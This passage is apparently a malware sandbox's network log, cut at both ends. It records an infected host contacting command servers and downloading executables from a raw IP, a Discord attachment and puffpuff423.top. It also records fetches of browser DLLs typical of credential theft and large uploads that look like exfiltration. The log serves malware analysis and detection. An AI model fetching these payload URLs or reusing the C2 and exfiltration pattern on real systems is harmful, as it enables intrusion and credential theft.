Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT
ETag: "14748-58a9fc6b90280"
Accept-Ranges: bytes
Content-Length: 83784
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address: 217.8.117.77:80
Request
POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 67541
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address: 217.8.117.77:80
Request
GET /ac.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:07 GMT
ETag: "7e000-5b44f64a37542"
Accept-Ranges: bytes
Content-Length: 516096
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
GET /rc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:04 GMT
ETag: "d7d70-5b44f6472012d"
Accept-Ranges: bytes
Content-Length: 884080
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
GET /ds1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:53 GMT
ETag: "57000-5b3c37b62707c"
Accept-Ranges: bytes
Content-Length: 356352
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
GET /ds2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:52 GMT
ETag: "60e00-5b3c37b56c439"
Accept-Ranges: bytes
Content-Length: 396800
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 8.8.8.8:53
Request
agentttt.ac.ug IN A
Response
agentttt.ac.ug IN A 79.134.225.40
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
discord.com IN A
Response
discord.com IN A 162.159.136.232
discord.com IN A 162.159.135.232
discord.com IN A 162.159.128.233
discord.com IN A 162.159.137.232
discord.com IN A 162.159.138.232
-
Remote address: 8.8.8.8:53
Request
cdn.discordapp.com IN A
Response
cdn.discordapp.com IN A 162.159.133.233
cdn.discordapp.com IN A 162.159.135.233
cdn.discordapp.com IN A 162.159.134.233
cdn.discordapp.com IN A 162.159.129.233
cdn.discordapp.com IN A 162.159.130.233
-
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
FcIiEO8Bol.exe
Remote address: 162.159.133.233:443
Request
GET /attachments/752128569169281083/778280249590939708/Klfn123 HTTP/1.1
Host: cdn.discordapp.com
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 602112
Connection: keep-alive
Set-Cookie: __cfduid=dee1b7db0691e11842db397be981b58c41605707074; expires=Fri, 18-Dec-20 13:44:34 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 5f422080ea520c75-AMS
Accept-Ranges: bytes
Age: 76286
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Klfn123
ETag: "64913e7b57d36c1b93698ff1be8064ac"
Expires: Thu, 18 Nov 2021 13:44:34 GMT
Last-Modified: Tue, 17 Nov 2020 15:27:51 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
cf-request-id: 067d32a48d00000c75f6212000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1605626871303001
x-goog-hash: crc32c=Qy0Dkg==
x-goog-hash: md5=ZJE+e1fTbBuTaY/xvoBkrA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 602112
X-GUploader-UploadID: ABg5-UyDA5xCM-pZaX7gOQrQsl_FgXEcXLMqWzYqtDRAUnl5EUh6_V7jBmIQXv0xUZHl4ZSzHAqck9pTkrt3EDvOWzCmdOrd_g
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QjmzgtcLdI5KKv5876qTm11EFFN19c15RR7Gu9AP8Q7OoamNAyPKPAzmvKYNqpNmNPjDAzTOemtMlyTuuhaFolbKtCSUbj7%2FIxDIRnc%2F7BBHUiY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
Remote address: 217.8.117.77:80
Request
GET /axcjgfhwvvas.exe HTTP/1.1
Host: 217.8.117.77
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:25:11 GMT
ETag: "a6c00-5b3c31f77846f"
Accept-Ranges: bytes
Content-Length: 683008
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 195.201.225.248:443
Request
GET /brikitiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in
Response
HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:44:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=883f12999fc2fbd72c_2157886719445103115; expires=Thu, 19 Nov 2020 13:44:52 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000
-
Remote address: 104.27.132.115:443
Request
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: puffpuff423.top
Response
HTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7fe953f893335af4bdd0b7f3ff3f33421605707094; expires=Fri, 18-Dec-20 13:44:54 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32f27500000b47d40f8000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mJyTKskUygX7gvdt60fehdCI3EbdfgevGDT4yU0Dhi7K%2Fk8z8bFoE%2Fg4ncHsbNubGvuR9ebpRq8mEKpy835R295UaPVc5l733uOq%2BhMYbxA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f4220fd8df30b47-AMS
-
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93cc
txi.exe
Remote address: 104.27.132.115:443
Request
GET //l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93cc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Set-Cookie: __cfduid=d3ab4ad0c42f82674f022657a3c6541fd1605707096; expires=Fri, 18-Dec-20 13:44:56 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-dfcff"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32fa1a00000b470c384000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aGtjLlVMlVHGQT07N8XA9IYmrwdQikySRlNwySHurV%2Fi2nYuxbME7UDAPtq98jNIxPvjlRqVPDtjQMFmOzylJz5fObdjiA%2Fh8VJTiC2gdls%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f422109c9f70b47-AMS
-
GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6
txi.exe
Remote address: 104.27.132.115:443
Request
GET //l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Set-Cookie: __cfduid=d5a6760798ec92c81e23291f8c9c80a541605707102; expires=Fri, 18-Dec-20 13:45:02 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-2b281b"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d330fed00000b47f39a6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=W0UVbEVNs2U0xKih8enEsADAyapW7JEVwH6e8zFXO4QhC%2FwjEBQ0qKqRuLO3p4V%2FwOvJmxoxvVaLKKyM0wKLTtlQad%2FaQfuQ1UWTw2hn9Zs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42212caca80b47-AMS
-
Remote address: 104.27.132.115:443
Request
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 549760
Host: puffpuff423.top
Response
HTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d92a3babe42c2fcd77f911fa7dc5fabc41605707138; expires=Fri, 18-Dec-20 13:45:38 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d339d2e00000b47c6bab000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5SLUT7YD1k9aeVDGSwERMINm7vT7b1yPMcnrIV5L65D4W5Y%2BpAP806uFGB6ZoFvT6ZhaYS1BlaZdMH21CTwp7oqMtq%2F7zQY4KLep15%2Fwfo4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42220ebf150b47-AMS
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 217.8.117.77:80
Request
GET /oscjgfhwvvas.exe HTTP/1.1
Host: 217.8.117.77
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:25:09 GMT
ETag: "b0800-5b3c31f5bde5b"
Accept-Ranges: bytes
Content-Length: 722944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 217.8.117.77:80
Request
GET /ac.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:07 GMT
ETag: "7e000-5b44f64a37542"
Accept-Ranges: bytes
Content-Length: 516096
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: jamesrlongacre.ug
Content-Length: 101
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 217.8.117.77:80
Request
GET /rc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:04 GMT
ETag: "d7d70-5b44f6472012d"
Accept-Ranges: bytes
Content-Length: 884080
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 217.8.117.77:80
Request
GET /ds1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:53 GMT
ETag: "57000-5b3c37b62707c"
Accept-Ranges: bytes
Content-Length: 356352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
GET /ds2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:52 GMT
ETag: "60e00-5b3c37b56c439"
Accept-Ranges: bytes
Content-Length: 396800
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 217.8.117.77:80
Request
POST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT
ETag: "217d0-58a9fc4382400"
Accept-Ranges: bytes
Content-Length: 137168
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT
ETag: "6b738-58a9fc4d0ba80"
Accept-Ranges: bytes
Content-Length: 440120
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT
ETag: "1303d0-58a9fc5a65a00"
Accept-Ranges: bytes
Content-Length: 1246160
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT
ETag: "14748-58a9fc6b90280"
Accept-Ranges: bytes
Content-Length: 83784
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address: 217.8.117.77:80
Request
POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 56106
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
GET https://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123
eJZoW1GjJt.exe
Remote address: 162.159.133.233:443
Request
GET /attachments/752128569169281083/778280249590939708/Klfn123 HTTP/1.1
Host: cdn.discordapp.com
Cache-Control: no-cache
Cookie: __cfduid=dee1b7db0691e11842db397be981b58c41605707074
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 602112
Connection: keep-alive
CF-Ray: 5f4223e65886fa78-AMS
Accept-Ranges: bytes
Age: 76425
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Klfn123
ETag: "64913e7b57d36c1b93698ff1be8064ac"
Expires: Thu, 18 Nov 2021 13:46:53 GMT
Last-Modified: Tue, 17 Nov 2020 15:27:51 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
cf-request-id: 067d34c3f70000fa78463d2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1605626871303001
x-goog-hash: crc32c=Qy0Dkg==
x-goog-hash: md5=ZJE+e1fTbBuTaY/xvoBkrA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 602112
X-GUploader-UploadID: ABg5-UyDA5xCM-pZaX7gOQrQsl_FgXEcXLMqWzYqtDRAUnl5EUh6_V7jBmIQXv0xUZHl4ZSzHAqck9pTkrt3EDvOWzCmdOrd_g
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lyx998yZT0VUn2LTnhzbP8CL205FcrXAAk0nWH0tOaMcWWOWBChNjgGOsr4a9aEjMoxsP0WKObxM7gVDqUnT8X%2FBabY3t6VkF2yLHIMTe3QPxaA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
taenaia.ac.ug IN A
Response
taenaia.ac.ug IN A 185.140.53.149
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpurple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
Request
agentpapple.ac.ug IN A
Response
-
Remote address: 8.8.8.8:53
